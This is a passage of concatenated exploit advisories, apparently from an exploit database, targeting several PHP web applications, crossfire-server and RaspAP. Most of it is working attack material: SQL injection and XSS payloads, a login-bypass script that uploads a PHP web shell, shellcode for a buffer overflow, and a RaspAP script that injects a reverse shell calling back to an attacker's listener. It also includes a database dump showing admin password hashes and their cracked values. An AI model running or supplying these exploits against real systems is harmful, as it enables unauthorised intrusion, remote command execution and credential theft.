FROM (SELECT(SLEEP(5)))foo)-- &oname=&username=&status= And after 5 seconds we got: HTTP/1.1 200 OK Date: Tue, 17 Aug 2021 14:28:59 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/7.4.22 Content-Length: 1074 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html> etc...

# Exploit Title: COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections # Date: 17-08-2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ # Version: V1 # Category: Webapps # Tested on: Linux/Windows # Description: # PHP Dashboards is prone to an SQL-injection vulnerability # because it fails to sufficiently sanitize user-supplied data before using # it in an SQL query.Exploiting this issue could allow an attacker to # compromise the application, access or modify data, or exploit latent # vulnerabilities in the underlying database. # Vulnerable Request: POST /check_availability.php HTTP/1.1 Host: localhost Content-Length: 12 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88" Accept: */* X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/add-phlebotomist.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9 Connection: close employeeid=1 # Vulnerable Payload: # Parameter: employeeid (POST) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: employeeid=1' AND 2323=2323 AND 'gARj'='gARj # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) # Payload: employeeid=1' AND (SELECT 5982 FROM (SELECT(SLEEP(10)))aPnu) AND 'bDQl'='bDQl ------------------------------------------------------------------------------ # Vulnerable Request: POST /add-phlebotomist.php HTTP/1.1 Host: localhost Content-Length: 61 Cache-Control: max-age=0 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/add-phlebotomist.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9 Connection: close empid=1&fullname=dsadas&mobilenumber=1111111111&submit=Submit # Vulnerable Payload: # Parameter: empid (POST) # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) # Payload: empid=1' AND (SELECT 4626 FROM (SELECT(SLEEP(10)))jVok) AND 'bqxW'='bqxW&fullname=dsadas&mobilenumber=1111111111&submit=Submit ------------------------------------------------------------------------------ # Vulnerable Request: POST /edit-phlebotomist.php?pid=6 HTTP/1.1 Host: localhost Content-Length: 61 Cache-Control: max-age=0 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/edit-phlebotomist.php?pid=6 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9 Connection: close empid=1&fullname=dsadas&mobilenumber=1111111111&update=Update # Vulnerable Payload: # Parameter: fullname (POST) # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) # Payload: empid=1&fullname=dsadas' AND (SELECT 6868 FROM (SELECT(SLEEP(10)))yvbu) AND 'xVJk'='xVJk&mobilenumber=1111111111&update=Update ------------------------------------------------------------------------------ # Vulnerable Request: POST /bwdates-report-result.php HTTP/1.1 Host: localhost Content-Length: 51 Cache-Control: max-age=0 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/bwdates-report-ds.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9 Connection: close fromdate=2021-08-17&todate=2021-08-17&submit=Submit # Vulnerable Payload: # Parameter: fromdate (POST) # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) # Payload: fromdate=2021-08-17' AND (SELECT 6977 FROM (SELECT(SLEEP(10)))pNed) AND 'qbnJ'='qbnJ&todate=2021-08-17&submit=Submit ------------------------------------------------------------------------------ # Vulnerable Request: POST /search-report-result.php HTTP/1.1 Host: localhost Content-Length: 27 Cache-Control: max-age=0 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/search-report.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9 Connection: close serachdata=32&search=Search # Vulnerable Payload: # Parameter: serachdata (POST) # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) # Payload: serachdata=1231') AND (SELECT 1275 FROM (SELECT(SLEEP(10)))queW) AND ('HkZa'='HkZa&search=Search # Type: UNION query # Title: Generic UNION query (NULL) - 7 columns # Payload: serachdata=1231') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71706b7671,0x4a6d476c4861544c4c66446b6961755076707354414d6f5150436c766f6b4a624955625159747a4d,0x7170717071),NULL,NULL-- -&search=Search

# Exploit Title: crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow # Exploit Author: Khaled Salem @Khaled0x07 # Software Link: https://www.exploit-db.com/apps/43240af83a4414d2dcc19fff3af31a63-crossfire-1.9.0.tar.gz # Version: 1.9.0 # Tested on: Kali Linux 2020.4 # CVE : CVE-2006-1236 #!/bin/python import socket import time # Crash at 4379 # EIP Offset at 4368 # Badchar \x00\x20 # ECX Size 170 # CALL ECX 0x080640eb size = 4379 # Attacker IP: 127.0.0.1 Port: 443 shellcode = b"" shellcode += b"\xd9\xee\xd9\x74\x24\xf4\xb8\x60\x61\x5f\x28" shellcode += b"\x5b\x33\xc9\xb1\x12\x31\x43\x17\x03\x43\x17" shellcode += b"\x83\xa3\x65\xbd\xdd\x12\xbd\xb6\xfd\x07\x02" shellcode += b"\x6a\x68\xa5\x0d\x6d\xdc\xcf\xc0\xee\x8e\x56" shellcode += b"\x6b\xd1\x7d\xe8\xc2\x57\x87\x80\xab\xa7\x77" shellcode += b"\x51\x3c\xaa\x77\x50\x07\x23\x96\xe2\x11\x64" shellcode += b"\x08\x51\x6d\x87\x23\xb4\x5c\x08\x61\x5e\x31" shellcode += b"\x26\xf5\xf6\xa5\x17\xd6\x64\x5f\xe1\xcb\x3a" shellcode += b"\xcc\x78\xea\x0a\xf9\xb7\x6d" try: filler = "\x90"*(4368 - 170) + shellcode+"\x90"*(170-len(shellcode)) EIP = "\xeb\x40\x06\x08" padding = "C" * (4379 - len(filler) - len(EIP)) payload = filler + EIP + padding inputBuffer = "\x11(setup sound "+ payload +"\x90\x00#" print("Sending Buffer with size:" + str(len(payload))) s = socket.socket(socket.AF_INET , socket.SOCK_STREAM) s.connect(("192.168.1.4",13327)) # Server IP Address: 192.168.1.4 print(s.recv(1024)) s.send(inputBuffer) s.close() except: print("Could not connect") exit(0)

# Exploit Title: Charity Management System CMS 1.0 - Multiple Vulnerabilities # Date: 18/08/2021 # Exploit Author: Davide 't0rt3ll1n0' Taraschi # Vendor Homepage: https://www.sourcecodester.com/users/tips23 # Software Link: https://www.sourcecodester.com/php/14908/simple-charity-website-management-system-cms-php-free-source-code.htmlpolice-crime-record-management-system.html # Version: 1.0 # Testeted on: Linux (Ubuntu 20.04) using LAMPP ## Unauthenticated reflected XSS # Vulnerable code in '/search.php' at line 44/45: <?php if($count_all <= 0): ?> <h4 class="text-center">No Article with "<?php echo $_GET['search'] ?>" keyword found.</h4> The content of the 'search' variable is printed on the page without being checked, leading to XSS # PoC Go to 'http://site.com/charity/' and in the search box input "<svg onload=alert(document.domain)>" without the double quotes, and a text box should appear ## Authenticated stored XSS There is a stored XSS in '/charity/admin/maintenance/manage_topic.php' due to a failure to sanitize user input # Poc 1) Login as admin 2) Go to '/maintenance/manage_topic.php' 3) In "description" insert "<svg onload=alert(document.domain)>" without the double quotes 4) Click the "save" below 5) An alert box should appear ## POST Authenticated SQL Injection # Vulnerable code in '/charity/classes/Master.php' at line 67 $del = $this->conn->query("DELETE FROM `topics` where id = '{$id}'"); The $id variable is used without being checked, leading to SQLi # PoC Request: POST /charity/classes/Master.php?f=delete_topic HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 4 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/charity/admin/?page=maintenance/topics Cookie: PHPSESSID=de17186191c1cbdeb6e815ea8c21103f Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo Response after 5 seconds (the sleep has been executed) HTTP/1.1 200 OK Date: Wed, 18 Aug 2021 14:32:13 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/7.4.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"} ## GET Authenticated SQL Injection # Vulnerable code in '/charity/admin/maintenance/manage_topic.php' at line 2/3 if(isset($_GET['id']) && $_GET['id'] > 0){ $qry = $conn->query("SELECT * from `topics` where id = '{$_GET['id']}' "); ... } As usual the 'id' variable is passed to the prepared statement without being checked, leading to (another) SQLi # PoC Similar to the previous one (same payload) ## POST Unauthenticated SQL Injection # Vulnerable code in '/charity/classes/Login.php' at line 21 $qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') "); The 'username' variable is passed without being sanificated, causing a SQLi # PoC Request: POST /charity/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 84 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/charity/admin/login.php Cookie: PHPSESSID=de17186191c1cbdeb6e815ea8c21103f Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin username=username' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo&password=password Response after 5 seconds (the sleep has been executed) HTTP/1.1 200 OK Date: Wed, 18 Aug 2021 14:48:18 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/7.4.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 164 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"incorrect","last_qry":"SELECT * from users where username = 'username' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo' and password = md5('password') "} ## PHP Code Injection lead to Authenticated Remote Code Execution (RCE) # Vulnerable code in /charity/classes/SystemSettings.php at line 37 $qry = $this->conn->query("UPDATE system_info set meta_value = '{$value}' where meta_field = '{$key}' "); The 'value' variable will be included in the homepage of the site without being checked, leading to RCE. # PoC 1) Go to /charity/admin/system_info.php and in the "Welcome content" click on "Code View" at the top right. 2) At the bottom of the html code enter the following code: <?php if(isset($_GET['cmd'])) {system($_GET['cmd']);} ?> 3) Click the "update" button 4) Go to the home page and at the end of the url tipe "?cmd=$cmd" without the double quotes and replacing $cmd with the command you want to execute 5) The output should appear in the homepage

# Exploit Title: Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated) # Date: 19/08/2021 # Exploit Author: Justin White # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html # Version: 1.0 # Testeted on: Linux (Ubuntu 20.04) using LAMPP ## SQL Injection # Vulnerable page http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id= #Vulnerable paramater The id paramater is Vulnerable to sqli #POC going to http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4'-- will throw errors on the web page. Notice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 5 Notice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 10 Using sqlmap with dump database sqlmap -u "http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4" --cookie="PHPSESSIONID=83ccd78474298cd9c3ad3def1f79f2ac" -D traffic_offense_db -T users --dump +----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+ | id | type | avatar | lastname | password | username | firstname | date_added | last_login | date_updated | +----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+ | 1 | 1 | uploads/1624240500_avatar.png | Admin | 0192023a7bbd73250516f069df18b500 (admin123) | admin | Adminstrator | 2021-01-20 14:02:37 | NULL | 2021-06-21 09:55:07 | | 9 | 2 | uploads/1629336240_avatar.jpg | Smith | 202cb962ac59075b964b07152d234b70 (123) | jsmith1 | John | 2021-08-19 09:24:25 | NULL | 2021-08-19 19:14:58 | +----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+

# Exploit Title: Laundry Booking Management System 1.0 - 'Multiple' SQL Injection # Date: 2021-08-19 # Exploit Author: Azumah Foresight Xorlali # Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14400&title=Laundry+Booking+Management+System+in+PHP+with+Free+Source+Code # Version: Version 1.0 # Category: Web Application # Tested on: Kali Linux Description: Laundry Booking Management System 1.0 application is vulnerable to SQL injection via the "id" parameter, which was not properly checked on the [edit_user.php,edit_customer.php,edit_order.php] page. #Vulnerable Request when logged in as a user with Supervisor or Manager: POST /laundry_sourcecode/laundry_sourcecode/edit_user.php?id=7 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/laundry_sourcecode/laundry_sourcecode/edit_user.php?id=7 Content-Type: multipart/form-data; boundary=---------------------------851226474159708868105526498 Content-Length: 1408 Connection: close Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r Upgrade-Insecure-Requests: 1 --- Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=7' AND (SELECT 5999 FROM (SELECT(SLEEP(5)))BOpa) AND 'voSh'='voSh --- ----------------------------------------------------------------------------------------------------------------------- #Vulnerable Request when logged in as Admin: POST /laundry_sourcecode/laundry_sourcecode/edit_customer.php?id=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/laundry_sourcecode/laundry_sourcecode/edit_customer.php?id=1 Content-Type: multipart/form-data; boundary=---------------------------17781030011592905058578147050 Content-Length: 767 Connection: close Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r Upgrade-Insecure-Requests: 1 --- Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 6874 FROM (SELECT(SLEEP(5)))ZCjC) AND 'GIau'='GIau --- ----------------------------------------------------------------------------------------------------------------------- #Vulnerable Request when logged in a Admin: POST /laundry_sourcecode/laundry_sourcecode/edit_order.php?id=18 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/laundry_sourcecode/laundry_sourcecode/edit_order.php?id=18 Content-Type: multipart/form-data; boundary=---------------------------167059892515401580571429373524 Content-Length: 886 Connection: close Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r Upgrade-Insecure-Requests: 1 --- Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=18' AND (SELECT 8201 FROM (SELECT(SLEEP(5)))odDG) AND 'wCli'='wCli ---

# Exploit Title: Laundry Booking Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 2021-08-19 # Exploit Author: Azumah Foresight Xorlali # Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14400&title=Laundry+Booking+Management+System+in+PHP+with+Free+Source+Code # Version: Version 1.0 # Category: Web Application # Tested on: Kali Linux Step1: Log in to the application with any valid user credentials. Step2: Select User Management and click add new user. Step3: Fill the required details and type "<script>alert(document.domain)</script>" in the address box or you can it on a notepad and paste it into the firstname and lastname since it doesn't you to type special characters into those fields Step 4:Click on Submit

# Exploit Title: Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 20-08-2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html # Version: V1 # Category: Webapps # Tested on: Linux/Windows # Online Traffic Offense Management System # contains a file upload vulnerability that allows for remote # code execution against the target. This exploit requires # the user to be authenticated, but a SQL injection in the login form # allows the authentication controls to be bypassed # File uploaded from "/admin/?page=user" has no validation check # and the directory it is placed in allows for execution of PHP code. """ (hltakydn@SpaceSec)-[~/Exploits-db/traffic_offense] $ python2 exploit.py Example: http://example.com Url: http://trafficoffense.com [?] Check Adress [+] Bypass Login [+] Upload Shell [+] Exploit Done! $ whoami www-data $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ pwd /var/www/html/uploads $ """ #!/usr/bin/env python2 import requests import time from bs4 import BeautifulSoup print ("\nExample: http://example.com\n") url = raw_input("Url: ") payload_name = "evil.php" payload_file = "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>" if url.startswith(('http://', 'https://')): print "Check Url ...\n" else: print "\n[?] Check Adress\n" url = "http://" + url try: response = requests.get(url) except requests.ConnectionError as exception: print("[-] Address not reachable") sys.exit(1) session = requests.session() request_url = url + "/classes/Login.php?f=login" post_data = {"username": "'' OR 1=1-- '", "password": "'' OR 1=1-- '"} bypass_user = session.post(request_url, data=post_data) if bypass_user.text == '{"status":"success"}': print ("[+] Bypass Login\n") cookies = session.cookies.get_dict() req = session.get(url + "/admin/?page=user") parser = BeautifulSoup(req.text, 'html.parser') userid = parser.find('input', {'name':'id'}).get("value") firstname = parser.find('input', {'id':'firstname'}).get("value") lastname = parser.find('input', {'id':'lastname'}).get("value") username = parser.find('input', {'id':'username'}).get("value") request_url = url + "/classes/Users.php?f=save" headers = {"sec-ch-ua": "\";Not A Brand\";v=\"99\", \"Chromium\";v=\"88\"", "Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryxGKa5dhQCRwOodsq", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} data = "------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ userid +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+ firstname +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+ lastname +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+ username +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+ payload_name +"\"\r\nContent-Type: application/x-php\r\n\r\n" + payload_file +"\n\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq--\r\n" upload = session.post(request_url, headers=headers, cookies=cookies, data=data) time.sleep(2) if upload.text == "1": print ("[+] Upload Shell\n") time.sleep(2) req = session.get(url + "/admin/?page=user") parser = BeautifulSoup(req.text, 'html.parser') find_shell = parser.find('img', {'id':'cimg'}) print ("[+] Exploit Done!\n") while True: cmd = raw_input("$ ") headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36'} request = requests.post(find_shell.get("src") + "?cmd=" + cmd, data={'key':'value'}, headers=headers) print request.text.replace("<pre>" ,"").replace("</pre>", "") time.sleep(1) elif upload.text == "2": print ("[-] Try the manual method") request_url = url + "/classes/Login.php?f=logout" cookies = session.cookies.get_dict() headers = {"sec-ch-ua": "\";Not A Brand\";v=\"99\", \"Chromium\";v=\"88\"", "sec-ch-ua-mobile": "?0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} session.get(request_url, headers=headers, cookies=cookies) else: print("[!]An unknown error") else: print ("[-] Failed to bypass login panel")

# Exploit Title: RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated) # Date: 23.08.2021 # Exploit Author: Moritz Gruber <[email protected]> # Vendor Homepage: https://raspap.com/ # Software Link: https://github.com/RaspAP/raspap-webgui # Version: 2.6.6 # Tested on: Linux raspberrypi 5.10.52-v7+ import requests from requests.api import post from requests.auth import HTTPBasicAuth from bs4 import BeautifulSoup import sys, re if len(sys.argv) != 7: print("python3 exec-raspap.py <target-host> <target-port> <username> <password> <reverse-host> <reverse-port>") sys.exit() else: target_host = sys.argv[1] target_port = sys.argv[2] username = sys.argv[3] password = sys.argv[4] listener_host = sys.argv[5] listener_port = sys.argv[6] endpoint = "/wpa_conf" exploit = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_host}\",{listener_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" url = "http://{}:{}/{}".format(target_host,target_port,endpoint) s = requests.Session() get_Request = s.get(url, auth=HTTPBasicAuth(username, password)) soup = BeautifulSoup(get_Request.text, "lxml") csrf_token = soup.find("meta",{"name":"csrf_token"}).get("content") post_data = { "csrf_token": csrf_token, "connect": "wlan; {}".format(exploit) } post_Request = s.post(url, data=post_data, auth=HTTPBasicAuth(username, password)) if post_Request.status_code: print("Exploit send.") else: print("Something went wrong.") print("Done")

# Exploit Title: Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated) # Date: 21/08/2021 # Exploit Author: Justin White # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html # Version: 1.0 # Testeted on: Linux (Ubuntu 20.04) using LAMPP ## SQL Injection # Vulnerable page http://localhost/PhoneBook/index.php # Vulnerable paramater username1 & password # POC Username = ' or sleep(5)='-- - Password = ' ' Using these to login will have the webapp sleep for 5 seconds, then you will be logged in as "' or sleep(5)='-- -" # Vulnerable Code index.php line 13 $sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'");